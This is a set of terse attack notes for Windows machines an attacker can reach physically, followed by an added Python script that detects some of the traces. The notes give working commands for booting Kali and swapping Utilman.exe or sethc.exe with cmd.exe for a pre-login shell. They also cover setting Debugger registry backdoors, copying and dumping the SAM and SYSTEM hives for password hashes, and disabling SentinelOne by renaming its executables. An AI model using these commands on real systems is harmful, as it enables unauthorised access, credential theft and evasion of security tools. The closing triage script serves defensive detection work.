USB Boot
Boot into Kali Linux from a USB drive.
The disk must not be encrypted.
USB ports must be enabled in the BIOS. If not, is the BIOS password protected?
BIOS - Master password
Hibernation issues
From Windows
shutdown /s /t 0
From Kali
ntfs-3g -o remove_hiberfile </dev/sdX> </path/to/mount>
Admin CLI
From Kali
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
WIN+U
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Hit SHIFT 5 times
From an open logon session
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
SAM dump
cp <...>/Windows/System32/config/SYSTEM /tmp
cp <...>/Windows/System32/config/SAM /tmp
samdump2 /tmp/SYSTEM /tmp/SAM
Kill AV/EDR
Check the AV executables list
SentinelOne
C:\Program Files\SentinelOne...
Change extension to “.old”:
AgentUI.exe
SentinelAgent.exe
SentinelCtl.exe
SentinelServicehost.exe
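Added example (not part of the original notes): an offline triage check for the traces left by the Utilman/sethc replacement under "Admin CLI" and by the ".old" renames under "Kill AV/EDR", meant to run against a read-only mount of the Windows volume. The function names, the agent directory argument and the sample tree are assumptions made for illustration; the file contents are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

ACCESSIBILITY = ("Utilman.exe", "sethc.exe")  # binaries the notes overwrite with cmd.exe

def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def find_ci(directory, name):
    """Case-insensitive lookup; NTFS names keep their original case on a Linux mount."""
    return next((e for e in Path(directory).iterdir()
                 if e.name.lower() == name.lower()), None)

def triage(system32, agent_dirs=()):
    """Return (finding, file name) tuples for a mounted Windows volume."""
    findings = []
    cmd = find_ci(system32, "cmd.exe")
    cmd_hash = sha256(cmd) if cmd else None
    for name in ACCESSIBILITY:
        target = find_ci(system32, name)
        if target is None:
            findings.append(("missing", name))
        elif sha256(target) == cmd_hash:
            findings.append(("identical_to_cmd", target.name))
    # Renamed originals (Utilman.exe.old, sethc.old) or disabled agent binaries
    for d in (system32, *agent_dirs):
        for e in sorted(Path(d).iterdir()):
            if e.is_file() and e.name.lower().endswith(".old"):
                findings.append(("renamed_to_old", e.name))
    return findings

def build_sample(root):
    """Constructed sample tree (fake file contents) standing in for a mounted volume."""
    s32, agent = Path(root, "System32"), Path(root, "Agent")
    s32.mkdir()
    agent.mkdir()
    (s32 / "cmd.exe").write_bytes(b"constructed cmd body")
    (s32 / "Utilman.exe").write_bytes(b"constructed cmd body")   # replaced copy
    (s32 / "Utilman.exe.old").write_bytes(b"constructed utilman body")
    (s32 / "sethc.exe").write_bytes(b"constructed sethc body")   # untouched
    (agent / "SentinelAgent.exe.old").write_bytes(b"constructed agent body")
    return s32, agent

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        s32, agent = build_sample(tmp)
        for finding in triage(s32, [agent]):
            print(finding)
```

The Image File Execution Options variant changes no file on disk, so this check does not see it; look for a Debugger value under the sethc.exe and utilman.exe keys in the SOFTWARE hive instead.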